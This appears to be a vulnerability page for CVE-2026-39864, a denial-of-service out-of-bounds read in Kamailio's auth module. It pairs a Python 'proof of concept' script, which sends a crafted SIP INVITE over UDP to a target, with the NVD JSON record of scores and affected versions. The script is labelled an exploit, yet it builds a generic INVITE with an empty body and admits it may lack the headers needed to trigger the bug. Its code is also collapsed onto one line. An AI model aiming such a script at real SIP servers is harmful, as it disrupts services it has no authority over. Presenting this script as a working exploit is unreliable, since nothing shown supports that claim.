CVE-2026-39864

import socket # Proof of Concept for CVE-2026-39864 # This script sends a crafted SIP packet to trigger the out-of-bounds read. # Target: Kamailio < 6.0.5 def send_exploit(target_ip, target_port): # Crafted SIP packet payload designed to trigger the vulnerability # during post-authentication identity checks. payload = ( "INVITE sip:test@" + target_ip + " SIP/2.0\r\n" "Via: SIP/2.0/UDP attacker.com:5060;branch=z9hG4bKnashds7\r\n" "Max-Forwards: 70\r\n" "To: <sip:test@" + target_ip + ">\r\n" "From: <sip:[email protected]>;tag=1928301774\r\n" "Call-ID: [email protected]\r\n" "CSeq: 314159 INVITE\r\n" "Contact: <sip:[email protected]>\r\n" "Content-Type: application/sdp\r\n" "Content-Length: 0\r\n" "\r\n" ) # Note: In a real scenario, specific headers or body content might be # required to trigger the specific identity check path. try: print(f"[*] Sending payload to {target_ip}:{target_port}...") s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.sendto(payload.encode(), (target_ip, target_port)) print("[+] Payload sent.") s.close() except Exception as e: print(f"[-] Error: {e}") # Example usage # send_exploit("192.168.1.10", 5060)

{"cve": {"id": "CVE-2026-39864", "sourceIdentifier": "[email protected]", "published": "2026-04-08T20:16:26.700", "lastModified": "2026-04-15T16:06:29.670", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kamailio is an open source implementation of a SIP Signaling Server. Prior to 6.0.5 and 5.8.7, an out-of-bounds read in the auth module of Kamailio (formerly OpenSER and SER) allows remote attackers to cause a denial of service (process crash) via a specially crafted SIP packet if a successful user authentication without a database backend is followed by additional user identity checks. This vulnerability is fixed in 6.0.5 and 5.8.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.7, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kamailio:kamailio:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.8.7", "matchCriteriaId": "DFE6E387-8DDD-4EE6-B837-CEB94BBDE3A4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:kamailio:kamailio:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.0.5", "matchCriteriaId": "68C6ED5C-A7BF-4C85-B46C-56F3B478B37B"}]}]}], "references": [{"url": "https://github.com/kamailio/kamailio/security/advisories/GHSA-6m86-m342-g48m", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}